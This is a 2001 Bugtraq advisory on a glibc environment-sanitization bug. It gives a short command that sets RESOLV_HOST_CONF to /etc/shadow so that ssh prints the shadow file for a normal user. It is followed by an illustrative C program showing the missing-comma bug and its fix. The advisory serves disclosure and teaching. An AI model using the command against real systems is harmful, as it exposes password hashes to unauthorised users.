[18519] in bugtraq


Glibc Local Root Exploit

daemon@ATHENA.MIT.EDU (Charles Stevenson)
Wed Jan 10 13:09:25 2001

Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
Message-Id:  <B6815818.E3F%csteven@newhope.terraplex.com>
Date:         Wed, 10 Jan 2001 00:06:48 -0700
Reply-To: Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
From: Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

Hi all,
  This has been bouncing around on vuln-dev and the debian-devel lists. It
affects glibc >= 2.1.9x and it would seem many if not all OSes using these
versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and
the actual fix was a missing comma in the list of secure env vars that were
supposed to be cleared when a program starts up suid/sgid (including
RESOLV_HOST_CONF)." The exploit varies from system to system but in our
devel version of Yellow Dog Linux I was able to print the /etc/shadow file
as a normal user in the following manner:

export RESOLV_HOST_CONF=/etc/shadow
ssh whatever.host.com

  Other programs have the same effect depending on the defaults for the
system. I have tested this on Red Hat 7.0, Yellow Dog Linux 2.0
(prerelease), and Debian Woody. Others have reported similar results on
slackware and even "home brew[ed]" GNU/Linux.

Best Regards,
Charles Stevenson
Software Engineer

--
  Terra Soft Solutions, Inc
  http://www.terrasoftsolutions.com/

  Yellow Dog Linux
  http://www.yellowdoglinux.com/

  Black Lab Linux
  http://www.blacklablinux.com
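The "missing comma" Ben Collins describes is a classic C pitfall: adjacent string literals are silently concatenated by the compiler, so leaving out one comma in an array of variable names merges two entries into one that never matches anything. The example below is added here for illustration; it is not glibc's code, and the short variable lists, the list names and the helper functions are assumptions chosen to show the bug class next to its fix. It builds the buggy and the corrected list, reports how many entries each really has, and runs a simplified startup sanitization (unsetenv over the list) so you can see that RESOLV_HOST_CONF survives with the buggy list and is cleared with the fixed one.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative lists of environment variables that a setuid/setgid program
 * should drop at startup. These are assumed for the demonstration and are
 * NOT the real contents of glibc's unsecure-variable list. */

/* Buggy list: the comma after "RES_OPTIONS" is missing. The compiler joins
 * the two adjacent literals into the single entry
 * "RES_OPTIONSRESOLV_HOST_CONF", so neither name is ever matched. */
static const char *const unsecure_vars_buggy[] = {
    "LD_PRELOAD",
    "LD_LIBRARY_PATH",
    "RES_OPTIONS"           /* <-- missing comma */
    "RESOLV_HOST_CONF",
    "HOSTALIASES",
    NULL
};

/* Corrected list: every name is its own entry. */
static const char *const unsecure_vars_fixed[] = {
    "LD_PRELOAD",
    "LD_LIBRARY_PATH",
    "RES_OPTIONS",
    "RESOLV_HOST_CONF",
    "HOSTALIASES",
    NULL
};

/* Number of entries before the terminating NULL. A merged pair shows up
 * as one entry fewer than the source visually suggests. */
size_t list_length(const char *const *list)
{
    size_t n = 0;
    while (list[n] != NULL)
        n++;
    return n;
}

/* 1 if 'name' is on the list (and so would be cleared at startup), else 0. */
int would_be_cleared(const char *const *list, const char *name)
{
    for (; *list != NULL; ++list)
        if (strcmp(*list, name) == 0)
            return 1;
    return 0;
}

/* Simplified model of the sanitization a secure process performs: remove
 * every listed variable from the environment. Returns how many were removed. */
int sanitize_env(const char *const *list)
{
    int removed = 0;
    for (; *list != NULL; ++list) {
        if (getenv(*list) != NULL) {
            unsetenv(*list);
            removed++;
        }
    }
    return removed;
}

int main(void)
{
    printf("buggy list has %zu entries, fixed list has %zu\n",
           list_length(unsecure_vars_buggy), list_length(unsecure_vars_fixed));

    /* Constructed value: any readable path would do for the demonstration. */
    setenv("RESOLV_HOST_CONF", "/tmp/constructed-example-file", 1);
    sanitize_env(unsecure_vars_buggy);
    printf("after buggy sanitization RESOLV_HOST_CONF is %s\n",
           getenv("RESOLV_HOST_CONF") ? "still set" : "cleared");

    sanitize_env(unsecure_vars_fixed);
    printf("after fixed sanitization RESOLV_HOST_CONF is %s\n",
           getenv("RESOLV_HOST_CONF") ? "still set" : "cleared");
    return 0;
}
```

The check worth carrying into your own code reviews is the length count: an array of string literals that compiles with one fewer element than its source lines suggests is the signature of exactly this defect, and a unit test asserting the expected element count (or asserting that each sensitive name is individually matched) would have caught it before release.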
